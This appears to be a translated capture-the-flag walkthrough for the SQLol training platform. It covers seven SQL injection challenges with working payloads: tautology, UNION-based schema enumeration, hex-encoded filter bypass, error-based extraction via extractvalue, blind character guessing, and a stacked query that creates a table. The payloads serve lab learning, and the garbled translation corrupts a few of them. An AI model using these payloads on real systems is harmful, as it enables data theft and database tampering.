SQL injection Test Platform Sqlol-6.challenges Challenge

Sqlol the above challenges a total of 14, next we have a close to break through.

Challenge 0

The goal is to have the query return all user names, not just one.

Select username from users WHERE username = "'1 '" GROUP by username ORDER by username ASC

Injection point at "1"

Construct Poc:1 ' or 1=1# or 1 ' and 1=2 Union select username from users#

All user names can be queried.

Challenge 1

The goal is to find the Social Security number table that exists in the database and extract the information.

Select username from users WHERE username = "' 1 '" GROUP by username ORDER by username ASC

The injection point at "1", we need to know which tables which fields, in order to find the information we want to, for this, we use INFORMATION_SCHEMA to check the list.

To construct a POC:

Isolate all libraries of the database, ' and 1=2 UNION SELECT Table_schema from information_schema.tables#

Select Sqlol Library table, ' and 1=2 UNION select table_name from information_schema.tables WHERE table_schema= ' sqlol ' #

Select table, check column, ' and 1=2 UNION select column_name from information_schema.columns WHERE table_name= ' ssn ' #

Select field, check data, ' UNION select concat (name, 0x7e, ssn) from ssn#

This is where you get the information you want.

Challenge 2

The goal is to find the Social Security number table that exists in the database and extract the information.

Select username from users WHERE isadmin = ' 1 ' GROUP by username ORDER by username ASC

The injection point at "1", similar to Challenge1, is different, this is a digital injection, filtered single quotes.

To construct a POC:

Find all libraries in the database, 1 and 1=2 UNION SELECT Table_schema from information_schema.tables#

Select Sqlol Library table, 1 and 1=2 UNION Select table_name from Information_schema.tables WHERE table_schema=0x73716c6f6c# (0x73716c 6F6C is the hex code of SQLOL)

Select table, check column, 1 and 1=2 UNION select column_name from Information_schema.columns WHERE table_name=0x73736e# (0x73736e is SSN Hex code)

Select field, check data, 1 and 1=2 UNION select concat (name, 0x7e, ssn) from ssn#

This is where you get the information you want.

Challenge 3

The goal is to find the Social Security number table that exists in the database and extract the information.

No prompt, only one line, detailed error message, query does not display, similar to challenge 1.

To construct a POC:

' UNION SELECT concat (name, ': ', ssn ') from SSN LIMIT 0,1

Challenge 4

The aim is to find out the Social Security Number table in the database and extract its information without blind SQL injection technology.

Hint, there are detailed errors that can be injected with an error

To construct a POC:

' and Extractvalue (1, concat (0x5c, (select User ())) #

' And Extractvalue (1,concat (0x01, (select concat (Name, ': ', ssn) from SSN limit 0,1)) #

Challenge 5

The goal is to find the Social Security number table that exists in the database and extract the information.

Hint, use blind, no input error message

To construct a POC:

Get the length of the database: 1 ' or Length (database ()) =5#

Verbatim guessing ASCII: 1 ' or ASCII (Mid (Database (), 1, 1)) =115#

Slowly guess, always guess, the approximate method of this.

Challenge 6

The goal is to create a new table called "Ipwntyourdb" that uses a stacked query.

To construct a POC:

SELECT username from users WHERE username = ' Herp derper '; CREATE table Ipwntyourdb (ID VARCHAR (+) not NULL) # GROUP by us Ername ORDER by username ASC

SQL injection test platform Sqlol-6.challenges challenges